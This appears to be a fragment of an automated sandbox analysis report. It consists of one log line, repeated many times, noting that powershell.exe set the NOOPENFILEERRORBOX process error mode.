                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
